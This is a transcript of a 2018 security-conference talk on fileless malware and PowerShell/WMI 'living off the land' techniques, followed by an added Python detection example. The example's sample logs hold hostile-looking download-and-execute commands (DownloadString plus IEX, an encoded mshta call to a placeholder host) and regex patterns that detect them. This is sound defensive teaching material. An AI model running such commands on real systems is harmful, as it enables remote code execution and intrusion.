Fileless malware -Jim Van De Ryt

BSides Peru · 25:53 · Published 2018-06
About this talk
Fileless Malware

Abstract: In 2017, over half of all malware was fileless malware. As cyber threat adversaries evolve, so do their methods. Today, fileless malware is more prevalent in organizations' environments than file-based malware, because file-based malware can be detected and blocked with current security controls: it is detectable via artifacts known as Indicators of Compromise (IOCs). To resolve this dilemma, cyber threat adversaries had to find a way to complete their malicious operations without being detected by current controls. Since fileless malware leaves almost no artifacts, there can be no threat detection or threat hunt using Indicators of Compromise, because no IOCs exist. Instead, the Tactics, Techniques and Procedures (TTPs) that cyber threat adversaries use are the way to detect modern attack scenarios.

Bio: Jim VanDeRyt has worked in information security for the past 17 years. Jim spent almost 7 years at Internet Security Systems, where he learned network security such as intrusion prevention systems, vulnerability management and some host-based protection. Next, Jim spent two and a half years with a reseller, learning various security technologies such as data loss prevention, wireless planning and security, firewalls, network access control, host and file encryption, and some database security and application security. Prior to Cybereason, Jim was at Imperva for four and a half years, where he learned about securing structured business data, which usually resides in databases and is usually accessed by web applications in most customers' environments today. After Imperva, Jim worked at Fidelis Cybersecurity for three and a half years, where he learned about advanced threat detection/prevention on the network.
Transcript [en]

Next we have Jim, and he is going to talk about some current trends on living off the land, and this is fileless malware. Let's give him a hand.

Okay, just making sure that one mic is off and the other one is on, otherwise we're going to have some bad feedback. I've been doing cybersecurity, or what used to be called information security, for about 18 years: worked for a customer, done reseller, done vendor, currently work for a vendor. So just as a heads up, this is very informational about what's going on right now. Can you guys hear me okay? Okay, there we go. So we'll go through the agenda. We'll just go through what traditional malware was typically considered, and now what's called fileless malware. Fileless malware is kind of a BS industry term; for whatever reason it got tagged as fileless malware, versus, like, once you're in an environment, using tools that are already there, aka living off the land. But if you research it, you go to Dark Reading and you want to find out something about it, or one of those other websites with good info, fileless malware is what you look for. So we'll go through a little bit of history, some newer variants, talk about what the current trend is for living off the land by attackers, and

then detecting some of it from the current tool set that you have in your environment. So of course you've got to do the dictionary, Wikipedia definition here. Traditional malware, most people think, would have an executable associated with it, although fileless malware goes back quite far, and if you were in Brian's talk before, he talked about PowerShell and going all the way back to using VBS with the ILOVEYOU virus. I didn't quite go back that far in the history, but 2001, so a couple of years different. But fileless malware is literally usually defined by a few things: no files; usually it does one of a few things: it exploits a vulnerability, and that's what used to happen very frequently, that's why IDS/IPS was born, and it would take advantage of a vulnerable operating system or application; it may reside in memory, and that's quote fileless; or plant itself in the registry for persistence, perhaps, again quote fileless. So these kinds of definitions are what make it quote fileless malware. If you guys have questions, please don't wait until the end, just raise your hand.

So I did some research on this. Actually, when I started here at this company about six months ago, I was told I had to give a talk to 158 people at the North Texas ISSA and I had to come up with a

subject that was relevant to what was happening in the industry today. So I did some research and I came across this Dark Reading article published in December around fileless malware. I'm like, what literally is fileless malware? That was my question. So I did a lot of research into it and dug into several sources and found out that there's some general consensus: between 50 and 60 percent of all malware in 2017, and the key piece here is that the second half of the year was really when it took off. And the only reason that quote fileless malware, or living off the land, exists is to evade detection. So once you do get into an environment, rather than downloading something that has an IOC hash match, or a command and control domain or URL that your current controls can catch, or that you can detonate in a malware sandbox or whatever it might be, it's just another way to get around current controls. The key piece about that is there's not a whole lot of IOCs that are left behind. If you ever use PowerShell or use the Windows Management Instrumentation command line, nothing really is left behind, unless you are watching it while it's happening.

So we'll dig into a little bit of this. This is the very, very abridged history of fileless malware. So who can tell me why

Code Red, back in 2001, is called Code Red? Yep, yeah, that's correct. Actually, it was a company called eEye back in the day, a threat group that did a lot of antivirus decompilation and investigation on what was happening in the virus space, the vulnerability exploitation, that kind of thing, and they actually named it this because they were drinking Code Red. Anyway, it's one of the farthest back ones, and Brian did bring up the ILOVEYOU virus, which was VBS, 2000, so about that same time. There were a lot more scripting things that took advantage of a vulnerability, not necessarily came in an email, although ILOVEYOU was one of the first ones. With that said, Code Red was an interesting thing because it was one of the first real worms out there that got loose. What it would do is take advantage of a vulnerable IIS server, and back then they weren't behind a firewall, oftentimes right on the internet without much protection, and it would take advantage of that vulnerability and create 99 threads to exploit additional IP addresses on the internet, to spread itself to wherever it could find on the Internet, and then it would deface the webpage. Boy, if we could just go back to the days when all you had to worry about was webpage defacement. I don't know if you

guys remember back in the day when this was one of the webpage defacements: AirTran had a plane go down, and somebody defaced their website, and, I guess, the hacker humor at the time had the plane going down in flames and people on fire falling out of the plane, so they tried to, you know, kill the brand, or whatever it might be. SQL Slammer was a unique one. I remember back in the day, this one was almost impossible to stop. It was a concept at Black Hat for a buffer overflow in Microsoft SQL, and actually somebody used it and did something with it. The unique part about it was that it was a one-packet UDP attack, and there's nothing, I don't think even today still, how are you going to stop that? There's no session; even in IDS/IPS, one packet goes right by it, so it's very difficult to stop. But this stat that I got off the internet said seventy-five thousand machines in ten minutes, but it was actually every single machine that was vulnerable on the internet, and it happened in under 11 minutes, so a very fast spreading worm. So those were some of the faster spreading pieces.

Now we're going to fast forward, because otherwise we'll be here all day. So Poweliks is a more modern, still not really the most modern but more modern

type of quote fileless malware. This one did use a vulnerability, and you'll notice as we get newer and newer, they're not using vulnerabilities to get into the organization, they're using more along the lines of phishing emails and that type of thing to get into the organization. But this one did exploit a remote privilege escalation vulnerability, and the cool part about it was, for the first time, it used unreadable Unicode characters in the registry, so while the registry could interpret it, the humans could not, and so it was a good way to hide itself. Also, any time you double-clicked on a folder, opened a folder, it would run; that was one of its persistence mechanisms, and it also had watchdog stuff that typical malware does today. But this is one of the ones in the quote fileless, aka registry entries, category; this is one of the first ones that did that. You guys have probably seen this before, and somewhere there were screen lockers. So Kovter started out as a screen locker, quote scareware, to try and get people to, you know, enter some sort of money, much like ransomware, to unlock your screen. Kovter has evolved. It started out pretty normal; this is almost all it did. Kovter has actually really been used more recently in ransomware, and there's a lot of updates that it's posing as,

updates for Chrome, Firefox, whatever it might be, and for a while it was used for malvertising. So a pretty flexible piece of quote fileless malware out there; it's still around today as ransomware. And then let's fast forward to 2017. Some of this was starting to be developed in 2016, and this is being used pretty extensively. You'll notice one thing about every single one of these: find one word that's the same in all four of these. That's right, living off the land, what is in the environment. So another piece is there's another word in three of them. Yeah, macro, evil macro. Well, you know, the idea here is that when you have a macro, the compiled hash still looks like the Word or Excel or whatever it is, but the macro can contain some bad code in it and be launched. So usually what these do is they come in as a macro, they launch PowerShell into memory, and then they do their dirty work. Usually they get in by a phishing attack. One of the interesting ones, PowerWare, is a really unique way to use PowerShell to encrypt the entire system for a quote ransomware. This is not one usually used to encrypt and then ask for money; it's usually used to encrypt and make it forensically inaccessible, because it is a script that's downloaded to encrypt the

machine. With PowerWare, as a result, you know, usually there isn't anything left to pop up anything on the screen or send you an email or whatever to tell you to give me money to unencrypt your machine. August was a unique one, and this is, you know, they're always trying to obfuscate the data, whether it's base64 encoding used with PowerShell, or XOR encoding, or whatever it might be, or compression. August used a PowerShell byte array, which PowerShell interprets just fine, everything's good there, but if you've ever looked at a byte array, to deobfuscate that takes some considerable time to find out what the real command was. So that was pretty unique. POSHSPY, which also, if you did go to Brian's talk, yeah, he also talked about POSHSPY. One of the unique things about this one is it started using WMI. We didn't see this a whole lot; just the PowerShell is really ubiquitous in almost all Windows environments, back to, I think it's Windows Server 2003, I think it is, so that was and still is most commonly used with fileless malware, but WMI is starting to pop up a lot more, and we'll talk about that in a little bit. Any questions so far?

Okay, we'll go over why PowerShell is currently the tool of choice for living off the land. Like we talked about, it's

everywhere. It's generally trusted because it's used by sysadmins to get the job done. Another one is that it's easy to downgrade; nobody's watching a downgrade of PowerShell. Version 3 and version 5 both have auditing capabilities, and you can go download, there's a couple of guides, turning on auditing to be able to audit for bad stuff happening in PowerShell, but if the attacker downgrades into version 2, it wipes out auditing completely, and that's usually one of the first things they'll do if they find version 3 or 5. Now you can monitor the system to watch for the downgrade; that's another thing you might want to do. Okay, it's also stealthy. It can load a couple of different ways: load directly into memory, as we talked about; another piece is the System.Management.Automation DLL, which is commonly used in environments and does not even show up in Task Manager; it doesn't show up as a service, so when it does load into memory, even if you did a process listing, it's not there. And these are normal tools that your system is used to; this is not the bad guys doing anything awful, it's just using what exists in the environment, like we talked about. It doesn't leave many artifacts behind. It's encrypted between machines, that's another piece. And let me go ahead and go through here real quick: often obfuscated in some way, as a

script; it can be cscript, wscript, lots of different ways you can get PowerShell to do your bidding. If you use an application whitelisting tool, you know, there's not a whole lot of granularity: PowerShell runs or it doesn't. And I'm not a genius on application whitelisting tools, so there might be some granularity in some products or solutions out there. Then the key piece is just to avoid current controls. If you think about it, if I send a phishing email and it's embedded in a macro, I dump it into memory; you know, that's obviously security awareness training that failed, somebody double-clicked on the macro, enabled it, dumped it into memory. The key piece there is everything that PowerShell does at the command line is text. It's not downloading any executables that would normally be an IOC pickup from, maybe, IDS/IPS, maybe the firewall, whatever it is, even in a malware sandbox. What are you going to detonate in the sandbox? There's no executable; it's text. So it really is something that is meant to avoid current controls, and it's often overlooked, you know, because this happens; it's been the reign of sysadmins forever, and it does a great job getting the operations part of the organization's work done. And then the key piece here too is another one, which is, again, this is where I'm showing you all the stuff that we built to help us,

including these entire PowerShell frameworks, and there's more out there, but red teams have created these, and for good. I mean, a lot of these, okay, I'm a field engineer, I am NOT a reverser of malware; I can fire up PS>Attack and it's just a menuing system, man, I mean, if I can do this, anybody can. PowerSploit, PowerShell Empire, they're all super easy to use, and so the bad guys, of course, you know, it's easy to use, why not use that too? So why is it so popular now? Just because it avoids controls. It avoids the risk of being caught; the attacker doesn't want to be caught. So it doesn't generate IOCs, generally doesn't need IOCs to install or get there or do much of anything. It's usually really flexible; it allows you to do many different things in the environment, so if one thing you do fails, so what, go back to the playbook, do another one, keep trying, keep trying, keep trying. I'm not leaving any artifacts behind, I'm not downloading executables, I'm just trying new things that probably will go unnoticed if auditing isn't turned on or you don't have something monitoring during it.

So let's talk about detecting fileless malware. So there's some basics. Usually it's pretty abnormal for PowerShell to run out of the temp directory or anything of that nature. This does happen fairly normally,

download and execute string, so DownloadString and execute, but usually with sysadmins, when they do it, they might download it, but it takes a little while for them to execute. If it's a bad guy, it's almost DownloadString and almost immediate execute. If they do download something that is file-based, oftentimes there's obfuscation: base64, XORing, compression, something of that nature. And oftentimes, if you don't normally use cscript or wscript, etc., any kind of scripting language for PowerShell, you can talk to your sysadmins about this; that's probably not your sysadmins doing it. Okay, so that's just another way to catch it. If they are using the PowerShell automation DLL normally... thank you so much for the ten-minute warning, it's almost beer o'clock, and I know I'm standing between you guys and beer, so we've got a few more slides here. If they are using the PowerShell automation DLL, sysadmins, you can ask them (a) not to use it or (b) use it under certain circumstances, since it does not show up: it loads in memory, does not show up in Task Manager, does not show up in the process listing. You can also watch for persistence. If a PowerShell script is using mshta or HTA, that is not your sysadmin, I can tell you that right now; that is highly, highly, highly unlikely. If

they're using Invoke-Expression, like for a framework for Metasploit, probably not your sysadmin. Using JavaScript engines, probably not your sysadmin doing that. These are persistence mechanisms a lot of the time. Okay, so we're almost done here. It's interesting, that 56 percent on average; I did a lot of research on the web, so I just took a bunch of articles, and some were 48 percent, some were 60-some-odd percent, some were 50 percent; I came up with 56 percent from the sources in 2017, and 2018 so far, 60%, which doesn't seem like a huge increase over file-based malware, but it's actually just shifting the playing field. So PowerShell was all the rage in 2017 and 2018, and I think that's why we had the advent of the MITRE ATT&CK framework two Februarys ago, so 16-ish months ago, which was around, you know, living off the land, what people were doing internally once they do get in. And we've seen a lot of uptick, and you can Google this, it's all out there, it's all research I just did on the Internet. WMI, or Windows Management Instrumentation, seems to be the big one now, because you guys are getting smarter: you're turning on auditing for PowerShell version 3 and 5, you're monitoring if it's being downgraded, you're working with your sysadmins about wscript, cscript, you know, you're getting smarter, and so to evade detection they're just moving to another powerful tool in your environment to get

the job done. And, you know, who knows what's next; maybe it's an old netcat, maybe it's other things that reside on Windows that they're going to start using. But the idea here is that this is a problem now, that's a current trend, I mean, and it's not gone away, so it's just something to be aware of; this is an awareness type thing. So that's it. Any questions? Yeah?

[Audience question, partly inaudible] ...but you mentioned both, correct, as... looking at that process, so something coming...

Yeah, if you're looking at, like, tactics, techniques and procedures, TTPs, I mean, you have something to do that; these are much more easily stoppable, okay? Since they don't generate really any artifacts, that is why IOCs are not useless, necessarily, but just much less useful than normal. So you're right.

Exactly. Really catching people living off the land is all about tactics, techniques and procedures, generally monitoring that and being able to, you know, catch them doing it when they're doing it. Generally, yes sir?

Yeah, there are some monitoring tools, from Microsoft and there are third-party ones too, that you can use in your environment literally just to monitor version changes. I will tell you that I've seen a couple of customers where this is not a problem, it's just that sometimes sysadmins don't want to modify their scripts, so they will actually downgrade from version 3 or 5 to version 2 to get it to run and then maybe upgrade it again. So if you see that... where I'm going with this is, yeah, it's just something to be aware of, but there are some monitoring tools you can use to do that today. So it's another way of just, you know, keeping an eye on things, what's going on in my environment: awareness.

[Audience question, partly inaudible] ...their commands to evade?

Well, yes and no. The whole reason obfuscation, geez, logically, exists is to evade detection of any kind of monitoring or auditing tool. So if you turn auditing on, version 3 or 5, you can monitor for obfuscation, which usually, you said, means don't use... yes, you could, but the auditing would pick that up, probably, if you configure auditing correctly via some guides on the internet, meaning, like, okay, it does DownloadString and execute in like one second; that's pretty unusual for a sysadmin to do, or, you know, a couple of other things: they're utilizing mshta or HTA, you know, those kinds of things in audit. So, but now... that's a good question, like, yeah, because things progress.

[Audience question, partly inaudible] ...or uses it as a lure?

Yeah, you're right, that quote obfuscated section of the stuff is a lure, thinking you've got them, and then there might be something else that's referenced later that is actually the bad part. Yep, I agree. No, you're right, I mean, it's a cyclical pattern, seems to go up and down. All right, it's beer o'clock, people. Thanks for your time. [Applause]
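To make the detection basics from the talk concrete, here is an added example (not from the talk or from any product the speaker mentions) that applies the heuristics he lists to a few constructed PowerShell log records: a version-2 downgrade on the command line, DownloadString followed within seconds by Invoke-Expression on the same host, an -EncodedCommand payload that is decoded and re-scanned, and mshta/HTA usage. Hosts, timestamps and URLs are constructed, and the record shape is assumed.

```python
import base64
import re
from datetime import datetime

# Constructed sample records (not real logs): a timestamp, a host name and the
# command line or script block text that PowerShell logging would have recorded.
SAMPLE_EVENTS = [
    {"ts": "2018-06-01T09:00:00", "host": "ws1", "text": "Get-ChildItem C:\\Users"},
    {"ts": "2018-06-01T09:05:00", "host": "ws2",
     "text": "powershell.exe -Version 2 -NoProfile -File deploy.ps1"},
    {"ts": "2018-06-01T09:07:00", "host": "ws3",
     "text": "$c=(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"ts": "2018-06-01T09:07:02", "host": "ws3", "text": "IEX $c"},
    {"ts": "2018-06-01T09:10:00", "host": "ws4",
     "text": "powershell.exe -enc " + base64.b64encode(
         "mshta http://example.invalid/x.hta".encode("utf-16le")).decode()},
    # A sysadmin-like pattern: download, then execute twenty minutes later.
    {"ts": "2018-06-01T10:00:00", "host": "ws5",
     "text": "$s=(New-Object Net.WebClient).DownloadString('http://intranet.invalid/t.ps1')"},
    {"ts": "2018-06-01T10:20:00", "host": "ws5", "text": "IEX $s"},
]

# Single-record indicators the talk calls out; each is a (name, regex) pair.
RULES = {
    "version_downgrade": re.compile(r"-v(ersion)?\s+2\b", re.I),
    "mshta_or_hta": re.compile(r"\bmshta\b|\.hta\b", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "download_string": re.compile(r"\bDownloadString\b", re.I),
}
ENC_RE = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(events, exec_window_s=30):
    """Return (host, finding) pairs; events must be in time order."""
    findings = []
    last_download = {}  # host -> time of the most recent DownloadString
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        text = ev["text"]
        decoded = decode_encoded_command(text)
        if decoded is not None:
            findings.append((ev["host"], "encoded_command"))
            text = text + " " + decoded  # run the other rules over the payload too
        for name, rx in RULES.items():
            if rx.search(text):
                findings.append((ev["host"], name))
        if RULES["download_string"].search(text):
            last_download[ev["host"]] = ts
        if RULES["invoke_expression"].search(text):
            prev = last_download.get(ev["host"])
            # Download followed almost immediately by execute is the attacker pattern.
            if prev is not None and (ts - prev).total_seconds() <= exec_window_s:
                findings.append((ev["host"], "download_then_execute"))
    return findings


if __name__ == "__main__":
    for host, finding in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

The slow download-then-execute on ws5 is deliberately left unflagged, matching the talk's point that the timing, not DownloadString itself, separates a sysadmin from an attacker.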